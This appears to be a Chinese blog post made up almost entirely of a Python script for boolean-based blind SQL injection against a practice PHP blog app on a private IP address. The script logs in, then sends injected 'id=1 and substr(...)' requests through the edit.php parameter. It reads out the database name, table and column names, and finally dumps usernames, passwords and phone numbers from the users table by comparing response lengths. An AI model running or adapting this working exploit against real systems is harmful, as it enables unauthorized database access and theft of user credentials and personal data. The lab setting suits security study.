Python SQL布尔型盲注

# -*- coding: utf-8 -*-
# @Time : 2022/6/16 17:12
# @Author : admin
# @Email : 1985264689@qq.com
# @File : blindtk.py
# @Project : 项目
# @脚本说明 :
from collections import Counter
import requests

#保持session会话状态
url = 'http://192.168.0.0/learn/blog/login-1.php'
data = {'username':'admin','password':'123456','vcode':'0000'}
session = requests.session()
resp = session.post(url=url,data=data)

#取数据库名称长度
count = []
for l in range(1,10):
    url1 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and length(database())={l}'
    data_len = session.get(url=url1)
    lens = len(data_len.text)
    #用Counter去计算列表内出现最多的值
    count.append(lens)
    num = Counter(count)
    res = num.most_common()
    max = res[0][0]
    if lens > max:
        print(l)

#取数据库名称
sum = 'abcdefghijklmnopqrstuvwxyz0123456789,_:'
dataname = ''
count = []
for k in range(1,16):
    for i in sum:
        url2 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr(database(),{k},1)="{i}"'
        data_name = session.get(url=url2)
        lens = len(data_name.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            dataname += i
            break
print(dataname)

#取数据库表名
table_list = ''
count = []
for h in range(0, 15):
    for i in sum:
        url3 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \
               f'substr((select group_concat(table_name) from information_schema.tables where table_schema="{dataname}"),{h},1)="{i}"'
        table_name = session.get(url=url3)
        lens = len(table_name.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            table_list += i
            break
print(table_list)

#取表中的列名
tablenames = table_list.strip().split(',')
count = []
for tablename in tablenames:
    column_list = ''
    for h in range(100):
        for i in sum:
            url4 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \
                   f'substr((select group_concat(column_name) from information_schema.columns where table_schema="{dataname}" and table_name="{tablename}" ),{h},1)="{i}"'
            column_name = session.get(url=url4)
            lens = len(column_name.text)
            count.append(lens)
            num = Counter(count)
            res = num.most_common()
            max = res[0][0]
            if lens > max:
                column_list += i
                break
    print(column_list)

# 取users表中的核心列名值
center_value = ''
count = []
for m in range(200):
    for i in sum:
        url5 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr((select group_concat(concat_ws(":",username,password,phone)) from users),"{m}",1)="{i}"'
        value = session.get(url=url5)
        lens = len(value.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            center_value += i
            break
print(center_value)
原文链接：https://blog.csdn.net/weixin_45972507/article/details/125586875